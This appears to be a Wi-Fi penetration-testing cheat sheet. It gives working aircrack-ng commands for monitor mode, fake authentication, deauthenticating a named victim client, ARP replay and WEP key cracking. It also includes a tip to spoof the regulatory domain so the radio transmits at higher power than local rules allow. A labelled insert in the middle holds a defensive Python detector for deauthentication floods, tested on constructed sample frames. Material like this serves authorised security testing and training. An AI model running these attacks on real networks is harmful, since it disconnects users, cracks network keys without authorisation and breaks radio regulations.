Wifi - Basics
Tools
- aircrack-ng/aircrack-ng - WiFi security auditing tools suite
- kimocoder/wifite2 - Fork of wifite2
- derv82/wifite2 - Rewrite of the popular wireless network auditor, "wifite". Development stopped in 2018.
- derv82/wifite - Wifite is an automated wireless attack tool.
Linux Wireless Basics
AP_MAC="XX:XX:XX:XX:XX:XX" # BSSID of the access point
VICTIM_MAC="XX:XX:XX:XX:XX:XX" # VIC - associated client station
ATTACKER_MAC="XX:XX:XX:XX:XX:XX" # MON - MAC of our monitor interface
AP_SSID="wifibox" # ESSID
SRC_ADDR="192.168.1.1"
DST_ADDR="192.168.1.255"
# driver install
apt install realtek-rtl88xxau-dkms
# network card recon
iwconfig
iw list
dmesg | grep 8187 # alfa card
# Increase Wi-Fi TX Power
iw reg set BO # regulatory domain (Bolivia) with a high TX power limit
iwconfig wlan0 txpower <NmW|NdBm|off|auto> # txpower is 30 (usually)
# find SSID and channel
iw dev wlan0 scan | grep SSID
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID"
iwlist wlan0 scanning | egrep "ESSID|Channel"
# monitor mode - start
airmon-ng start wlan0
airmon-ng start wlan0 3 # only on a particular channel e.g: 3
* Manual 1: iw dev wlan0 interface add mon0 type monitor
* Manual 2: iwconfig wlan0 mode monitor channel 3
ifconfig mon0 up
# monitor mode - stop
airmon-ng stop mon0
* Manual 1: iw dev wlan0 interface del mon0
* Manual 2: iwconfig wlan0 mode managed
Aircrack-ng Essentials
- Check and kill processes that could interfere with our monitor mode
airmon-ng check
airmon-ng check kill
pkill dhclient
pkill dhclient3
pkill wpa_supplicant
- List access points
airodump-ng mon0
airodump-ng mon0 -c 3 # only on a particular channel e.g: 3
airodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic to clearcap-*.cap
- Get and set mac address
macchanger -s mon0 # show current and permanent MAC
macchanger --show mon0 # same as -s
- Check aireplay card compatibility
aireplay-ng -9 mon0 # test injection
aireplay-ng -9 -i wlan1 mon0 # test card to card injection
Aircrack compatibility
- Determine the chipset and driver of a wireless card
- Known compatible cards: Alfa AWUS036H / TPLink WN722
Fake authentication attack
:warning: use it before each attack
airodump-ng -c 3 --bssid $AP_MAC -w wep1 mon0
# fake authentication = no arp
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
* Might need a real $ATTACKER_MAC, observe traffic using airodump
> Association successful! :-)
# fake authentication for picky AP
# Send keep-alive packets every 10 seconds
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>
# might need to fake your MAC ADDRESS first
Deauthentication attack
Force ARP packet to be sent.
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
* -0 <count> : number of deauthentication rounds to send (1 here), 0 = unlimited
> Sending 64 directed DeAuth.
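A defender-side counterpart, added here and not part of the original notes: a small Python detector that parses raw 802.11 MAC headers from a capture and flags a directed deauthentication burst like the "Sending 64 directed DeAuth" output above. The BSSID, client MAC, timestamps and frames are constructed sample data, not a real capture.

```python
import struct
from collections import defaultdict, deque

DEAUTH = (0, 0xC)  # 802.11 type 0 (management), subtype 12 (deauthentication)

def parse_80211(frame: bytes):
    """Parse the fixed 24-byte 802.11 MAC header (raw frame, no radiotap prefix)."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    hdr = {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
           "addr1": frame[4:10].hex(":"),   # receiver (target station or broadcast)
           "addr2": frame[10:16].hex(":")}  # transmitter (claims to be the BSSID)
    if (hdr["type"], hdr["subtype"]) == DEAUTH and len(frame) >= 26:
        hdr["reason"] = struct.unpack("<H", frame[24:26])[0]  # little-endian reason code
    return hdr

def detect_deauth_flood(frames, threshold=20, window=1.0):
    """frames: iterable of (timestamp_s, raw_frame). Returns one alert per (sender, target)
    pair whose deauth count inside a sliding `window` seconds reaches `threshold`."""
    recent, alerts = defaultdict(deque), []
    for ts, raw in frames:
        hdr = parse_80211(raw)
        if not hdr or (hdr["type"], hdr["subtype"]) != DEAUTH:
            continue
        key = (hdr["addr2"], hdr["addr1"])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) == threshold:  # fires when a burst first reaches the threshold
            alerts.append({"bssid": key[0], "target": key[1], "count": len(q),
                           "reason": hdr["reason"], "at": ts})
    return alerts

# Constructed sample capture (not real traffic): one beacon, one isolated deauth,
# then a 64-frame directed burst 10 ms apart, like the aireplay-ng output above.
AP, STA = bytes.fromhex("aabbccddeeff"), bytes.fromhex("112233445566")
BEACON = b"\x80\x00\x00\x00" + b"\xff" * 6 + AP + AP + b"\x00\x00"

def deauth_frame(reason: int) -> bytes:
    return b"\xc0\x00\x3a\x01" + STA + AP + AP + b"\x00\x00" + struct.pack("<H", reason)

def sample_capture():
    frames = [(0.0, BEACON), (0.5, deauth_frame(3))]
    return frames + [(2.0 + i * 0.01, deauth_frame(7)) for i in range(64)]

if __name__ == "__main__":
    for a in detect_deauth_flood(sample_capture()):
        print(f"deauth burst: {a['count']} frames from {a['bssid']} to {a['target']} (reason {a['reason']})")
```

With a real capture, feed the tool raw 802.11 frames with the radiotap header stripped; a single deauth per session is normal, a burst to one client from the BSSID is not.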
ARP Replay Attack
Video: wifu-20.mp4
The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key.
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
* -h $ATTACKER_MAC if the fake authentication was launched
* -h <CONNECTED_MAC> if a real client is associated
# -x 1000 -n 1000
# aireplay-ng -3 -x 1000 -n 1000 -b $AP_MAC -h $ATTACKER_MAC wlan0mon
# wait for ARP on the network
# alternatively you can de-auth some clients
aircrack-ng -b <BSSID> <PCAP_of_FileName>
aircrack-ng -0 wep1.cap
* -0 : colored output